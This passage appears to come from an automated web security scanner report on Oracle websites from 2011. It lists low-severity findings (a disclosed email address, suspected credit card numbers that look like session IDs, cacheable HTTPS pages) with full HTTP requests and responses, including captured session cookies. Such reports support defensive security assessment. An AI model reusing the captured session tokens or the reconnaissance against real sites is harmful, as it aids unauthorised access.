+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

13.21. http://solutions.oracle.com/portal/page/portal/searchresults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/searchresults

Issue detail

The following email address was disclosed in the response:

Request

POST /portal/page/portal/searchresults HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
Content-Length: 165
Cache-Control: max-age=0
Origin: http://solutions.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D

osf=&ms=xss+sqli+httpi+search+faq+contact&mo=containsany&sepg=57&fi=1&fs=57&pu=1&has=&as=2065%2C0&pao=equal&pav=&pan=sc_membership_location&pas=0&p_action=SUBMIT&ll=

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=109;ecid=113554883210,0)
Content-Length: 308973
Date: Mon, 17 Oct 2011 12:03:12 GMT
Content-Location: /servlet/page/searchresults

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
ail, Manufacturing, Financial Services, Insurance, Energy, Utilities, Public Sector and Higher Education. Learn more: http://www.fcs-inc.com

&lt;p&gt;&lt;/p&gt;&lt;center&gt;&lt;a href=&quot;mailto:info@fcs-inc.com&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://www.fcs-inc.com/images/mail-btn.png&quot; border=&quot;0&quot; alt=&quot;Mail&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.google.co.in/se
...[SNIP]...

14. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


14.1. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The following credit card number was disclosed in the response:

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<input type="hidden" name="p_instance" value="4454627354458997" id="pInstance" />
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...

14.2. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The following credit card number was disclosed in the response:

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<input type="hidden" name="p_instance" value="4454627354458997" id="pInstance" />
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...

15. Cacheable HTTPS response  previous  next
There are 61 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


15.1. https://campus.oracle.com/campus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/

Request

GET /campus/ HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:30 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 2060
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...

15.2. https://campus.oracle.com/campus/HR/apac-subscribe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/apac-subscribe.html

Request

GET /campus/HR/apac-subscribe.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/apac-subscribe.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:31 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 1637
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.3. https://campus.oracle.com/campus/HR/apac_internship.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/apac_internship.html

Request

GET /campus/HR/apac_internship.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:28:02 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 12288
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.4. https://campus.oracle.com/campus/HR/aus_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/aus_main.html

Request

GET /campus/HR/aus_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:36 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 28699
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.5. https://campus.oracle.com/campus/HR/cn_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/cn_main.html

Request

GET /campus/HR/cn_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 45746
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.6. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/emea-apply%20now.jsp

Request

GET /campus/HR/emea-apply%20now.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_current-openings.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:15 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 15370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

15.7. https://campus.oracle.com/campus/HR/emea-internship.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/emea-internship.html

Request

GET /campus/HR/emea-internship.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/emea-internship.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; _csoot=1318854354624; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dfunctiononclick%252528event%252529%25257Binternship%252528%252529%25257D%2526oidt%253D2%2526ot%253DDIV%26oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:43 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 11362
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.8. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/emea1-jobs-remove1.jsp

Request

GET /campus/HR/emea1-jobs-remove1.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:30 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 366566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

<style type="text/css">
<!--
a:hover {text-decoration: un
...[SNIP]...

15.9. https://campus.oracle.com/campus/HR/emea_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/emea_main.html

Request

GET /campus/HR/emea_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

